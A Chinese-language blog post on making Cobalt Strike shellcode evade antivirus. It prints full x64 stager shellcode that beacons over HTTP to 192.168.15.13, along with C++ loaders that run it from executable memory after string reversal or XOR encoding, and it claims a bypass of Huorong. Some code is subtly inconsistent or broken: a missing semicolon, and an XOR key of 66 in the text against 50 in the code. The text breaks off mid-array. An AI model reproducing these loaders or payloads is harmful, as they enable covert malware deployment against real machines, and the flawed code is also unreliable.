shellCode免杀技巧

news2024/11/27 13:50:20

目录

一、免杀简述

二、免杀方法

1.shellcode反转bypass

2.shellcode异或bypass

3.远程加载shellcode bypass

4.进程注入

5.未导出api bypass

6.掩日(进程注入工具)

其他的


本文章仅提供学习,切勿将其用于不法手段!

一、免杀简述

理论上讲,免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道,第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的,也就是说免杀技术⾄少是在 1989年以后才发展起来的。

1989年:第⼀款杀毒软件Mcafee诞⽣,标志着反病毒与反查杀时代的到来。 发展历史

1997年:国内出现了第⼀个可以⾃动变异的千⾯⼈病毒(Polymorphic/Mutation Virus)。⾃动变异就 是病毒针对杀毒软件的免杀⽅法之⼀,但是与免杀⼿法的定义 有出⼊。

2002年7⽉31⽇:国内第⼀个真正意义上的变种病毒“中国⿊客II”出现,它除了具有 新的特征之外,还 实现了“中国⿊客”第⼀代所未实现的功能,可⻅这个变种也是病 毒编写者⾃⼰制造的。

2004年:在⿊客圈⼦内部,免杀技术是由⿊客动画吧在这⼀年⾸先公开提出,由于 当时还没有CLL等专 ⽤免杀⼯具,所以⼀般都使⽤WinHEX逐字节更改。

2005年1⽉:⼤名鼎鼎的免杀⼯具CCL的软件作者tankaiha在杂志上发表了⼀篇⽂ 章,藉此推⼴了 CCL,从此国内⿊客界才有了⾃⼰第⼀个专⻔⽤于免杀的⼯具。

2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。

2005年08⽉:第⼀个可查的关于免杀的动画由⿊吧的浩天⽼师完成,为⼤量⿊客爱 好者提供了⼀个有 效的参考,成功地对免杀技术进⾏了第⼀次科普

2005年09⽉:免杀技术开始真正的⽕起来。 由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。

⼀直等到2002年7⽉31⽇,国内第⼀个真正意义上的变种病毒“中国⿊客II”才迟迟出 现,因此我们暂且 可以将国内免杀技术的起源定位在2002年7⽉。

如今:在国内hw的加持下,⽊⻢、⼯具免杀也越来越被重视。免杀技术在红队中也成为了必不可少的技 能。

二、免杀方法

1.shellcode反转bypass

使用cobaltstrike进行shellcode的生成,使用c++做一个加载器

#include <Windows.h>
​
int main() {
    unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x0a\x1a\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x63\x34\x54\x72\x00\x85\x9f\x68\x62\x66\x6a\x7b\x29\xc9\x73\x59\x1d\x66\xfb\xf5\x09\x12\xc1\x5f\xfb\x19\xf1\x65\xb6\x2d\xe7\x25\xbe\xd8\x75\xdf\x55\xa5\x04\xa3\x8b\xc0\xa2\xd0\x68\x0a\x9e\x02\x1a\xcd\x4c\xd5\x9f\x58\xb2\xdf\x82\x11\x15\x72\xf3\xa2\x2b\xd5\xbd\xdb\x03\x28\x2f\x75\x46\x45\xac\x62\xec\xf2\x25\x0e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x8c\xe0\xde\xa9\xce\xd0\x65\x65\xda\x6f\xc7\xf2\x92\xbe\x60\x70\xa9\x65\x43\xe5\x02\x19\x85\x6b\x4e\x60\x60\x0b\x99\x5c\x61\x00\x30\x31\x0d\x1a\xcd\xf5\x0f\xdf\xd6\x22\x85\xc7\xf1\x8c\x2f\xd6\x4d\xac\xc6\x57\x6b\xd4\x20\xa6\xfd\x00\xbe\xf5\x26\x79\xe9\x94\x7e\xbf\x11\x8c\x8e\xdc\xda\x26\x0b\x40\xb3\x47\x2e\x12\xa6\x92\x4b\x93\x2f\xe7\x71\x70\xaf\x3d\x42\x84\x73\xa1\xfe\xda\x41\xd6\x2e\x6c\x02\xd2\x06\x8e\x9e\xf6\x71\xa0\xa9\x31\xb4\x06\xbb\x45\x12\xe8\x0a\x3f\x28\x9c\xbb\xe0\x21\x30\xf8\x4a\x71\xb4\xb1\xbf\x66\x20\x1e\xa0\x68\x37\x0e\x08\x09\x0f\xab\xb8\xf7\xc1\xdf\x81\x5c\x2b\xb9\x11\x85\xbe\xc8\xbb\x75\xbe\xac\x5c\xbc\x2d\x69\x3d\x25\x69\x41\x30\x6c\x0a\xb4\xd7\x69\x95\x49\xe2\x51\xd3\x30\xef\x77\x2d\xe6\x0a\x27\xb3\x11\x82\xf1\x16\xe1\xc5\x8a\xbc\x24\x3c\x77\x7c\x53\x4b\x2e\xab\x76\xcd\xbf\xee\xc2\x1d\x1c\xf4\x20\x8e\x88\x3d\xf4\xca\x68\xb9\xd2\xf5\x2b\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x2e\x31\x33\x00\x6f\xaa\x51\xc3";
    void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exe, buf, sizeof(buf));
    ((void(*)())exe)();
​
}

是可以检测到的

我们使用python将整个shellcode去掉\x之后转置(str[::-1])

fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b80a1a00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f6334547200859f6862666a7b29c973591d66fbf50912c15ffb19f165b62de725bed875df55a504a38bc0a2d0680a9e021acd4cd59f58b2df82111572f3a22bd5bddb03282f754645ac62ecf2250e00557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d5349452031302e303b2057696e646f7773204e5420362e313b20574f5736343b2054726964656e742f362e30290d0a008ce0dea9ced06565da6fc7f292be6070a96543e50219856b4e60600b995c610030310d1acdf50fdfd62285c7f18c2fd64dacc6576bd420a6fd00bef52679e9947ebf118c8edcda260b40b3472e12a6924b932fe77170af3d428473a1feda41d62e6c02d2068e9ef671a0a931b406bb4512e80a3f289cbbe02130f84a71b4b1bf66201ea068370e08090fabb8f7c1df815c2bb91185bec8bb75beac5cbc2d693d256941306c0ab4d7699549e251d330ef772de60a27b31182f116e1c58abc243c777c534b2eab76cdbfeec21d1cf4208e883df4ca68b9d2f52b0041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e31352e3133006faa51c3

然后使用加载器进行木马生成

#include <Windows.h>
#include <stdio.h>
#pragma warning(disable:4996);
int main() {
    char *str = "shellcode";
    unsigned int char_in_hex;
    unsigned int iterations = strlen(str);
    unsigned int memory_allocation = strlen(str) / 2;
    char* temp = (char*)VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    int p = 0;
​
    for (int i = strlen(str) - 1; i >= 0; i--)
    {
        temp[p++] = str[i];
    }
​
    char* shellcode = (char*)temp;
​
    for (int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
        
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, memory_allocation)
    (*(void(*WINAPI)()) exec)();
    return 0;
}
​

火绒免杀

2.shellcode异或bypass

使用cobaltstrike进行shellcode的生成,使用c++做一个加载器

#include <Windows.h>
​
int main() {
    unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x0\x0\x0\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\xf\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x2\x2c\x20\x41\xc1\xc9\xd\x41\x1\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x1\xd0\x66\x81\x78\x18\xb\x2\x75\x72\x8b\x80\x88\x0\x0\x0\x48\x85\xc0\x74\x67\x48\x1\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x1\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x1\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\xd\x41\x1\xc1\x38\xe0\x75\xf1\x4c\x3\x4c\x24\x8\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x1\xd0\x66\x41\x8b\xc\x48\x44\x8b\x40\x1c\x49\x1\xd0\x41\x8b\x4\x88\x48\x1\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x0\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x0\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x7\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xa\x1a\x0\x0\x4d\x31\xc9\x41\x51\x41\x51\x6a\x3\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x0\x2\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\xa\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x6\x18\x7b\xff\xd5\x85\xc0\xf\x85\x9d\x1\x0\x0\x48\xff\xcf\xf\x84\x8c\x1\x0\x0\xeb\xd3\xe9\xe4\x1\x0\x0\xe8\xa2\xff\xff\xff\x2f\x6f\x47\x73\x34\x0\x31\x7b\x32\x49\x4f\x66\x9d\xa0\x93\x90\x83\x47\xa4\xa4\xe5\x4f\xcc\x89\x95\xd9\x20\x98\x59\x6f\xc4\xdd\x66\x17\x58\x48\x60\x4e\xa3\x51\x68\x7b\x4d\x0\x44\x60\x77\x53\xed\xd8\xe1\xca\x8a\x52\x5d\xe1\x68\x7e\x4e\x79\xd7\x80\x62\x9\xcd\x57\x86\xcd\x5f\x5c\x69\xbd\x6\xf1\x49\x5c\xc8\x3d\xbe\x0\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\xd\xa\x0\x98\xc\x44\x13\x56\x14\x5b\x4e\x35\xaa\x66\x55\xc1\x9c\xb\xcd\x71\x92\xc2\x13\x76\xde\x74\x38\x82\x7d\xf4\x4\xdd\x51\x28\x9b\xfa\x89\xb2\x30\x63\x6b\x34\x45\xe8\x4c\x63\xdf\xe9\x80\x5a\x6d\xee\xdd\x5a\x98\x18\xd\x9f\xa4\xb4\x87\xfc\xa1\xcd\x52\x18\x2b\x6b\x7b\x4d\xda\x6b\x39\x35\x7b\x4\x4c\x70\x31\x74\xa2\xfd\xf4\x3b\xd\x86\xe0\xaf\x33\x41\x53\x46\x7c\x89\x15\xde\x27\xe6\xca\x0\xbd\x9d\xaf\xcf\xc8\x2a\xec\xcb\xa9\x8e\xf\xd9\x3b\xe1\x3\x9c\x78\x43\x46\x88\x1b\xa6\xc0\x22\xf8\xad\x74\xa5\x79\xd7\xc3\x52\xe1\x3d\xdd\x57\xb1\x93\x0\x79\xba\x79\xf3\x74\x5d\x5f\xe\xa8\x3e\xbd\x21\xdd\x22\xa3\x2a\x85\x84\xbe\x87\x6c\x4c\xc5\x69\xe8\xbf\x1d\x5a\x20\x42\xd8\x50\xe0\xc9\x68\x90\x48\xe\x95\xd3\xf6\xb2\x88\xf9\x1f\x6a\xc4\xd7\x23\x12\xeb\x97\xf2\xd0\x62\x64\x91\x47\x71\xa4\x76\x86\xc2\xf\xe6\xfc\x4e\x72\x13\x72\x5c\x2\x85\xa7\x15\x78\x37\xba\x67\x2c\xbe\x6d\xea\x83\x90\x7d\xb5\x47\x0\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x0\x0\x40\x0\x41\xb8\x0\x10\x0\x0\x41\xb9\x40\x0\x0\x0\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x0\x20\x0\x0\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x7\x48\x1\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x5\x0\x0\x0\x0\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x2e\x31\x33\x0\x6f\xaa\x51\xc3";
    void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exe, buf, sizeof(buf));
    ((void(*)())exe)();
​
}

同样被杀

对shellcode进行异或,异或一个66

#include <Windows.h>
#include <stdio.h>
​
​
void main() {
    unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1";
​
    for (size_t i = 0; i < sizeof buf -1; i++) 
    {
        buf[i] ^= 50;
        printf("\\x%x", buf[i]);
    }
    
    void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exe, buf, sizeof(buf));
    ((void(*)())exe)();
    
​
    DWORD temp;
    VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp);
    ((void(*)())buf)();
}

再异或一个

#include <Windows.h>
#include <stdio.h>
​
​
void main() {
    unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x0a\x1a\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x63\x34\x54\x72\x00\x85\x9f\x68\x62\x66\x6a\x7b\x29\xc9\x73\x59\x1d\x66\xfb\xf5\x09\x12\xc1\x5f\xfb\x19\xf1\x65\xb6\x2d\xe7\x25\xbe\xd8\x75\xdf\x55\xa5\x04\xa3\x8b\xc0\xa2\xd0\x68\x0a\x9e\x02\x1a\xcd\x4c\xd5\x9f\x58\xb2\xdf\x82\x11\x15\x72\xf3\xa2\x2b\xd5\xbd\xdb\x03\x28\x2f\x75\x46\x45\xac\x62\xec\xf2\x25\x0e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x8c\xe0\xde\xa9\xce\xd0\x65\x65\xda\x6f\xc7\xf2\x92\xbe\x60\x70\xa9\x65\x43\xe5\x02\x19\x85\x6b\x4e\x60\x60\x0b\x99\x5c\x61\x00\x30\x31\x0d\x1a\xcd\xf5\x0f\xdf\xd6\x22\x85\xc7\xf1\x8c\x2f\xd6\x4d\xac\xc6\x57\x6b\xd4\x20\xa6\xfd\x00\xbe\xf5\x26\x79\xe9\x94\x7e\xbf\x11\x8c\x8e\xdc\xda\x26\x0b\x40\xb3\x47\x2e\x12\xa6\x92\x4b\x93\x2f\xe7\x71\x70\xaf\x3d\x42\x84\x73\xa1\xfe\xda\x41\xd6\x2e\x6c\x02\xd2\x06\x8e\x9e\xf6\x71\xa0\xa9\x31\xb4\x06\xbb\x45\x12\xe8\x0a\x3f\x28\x9c\xbb\xe0\x21\x30\xf8\x4a\x71\xb4\xb1\xbf\x66\x20\x1e\xa0\x68\x37\x0e\x08\x09\x0f\x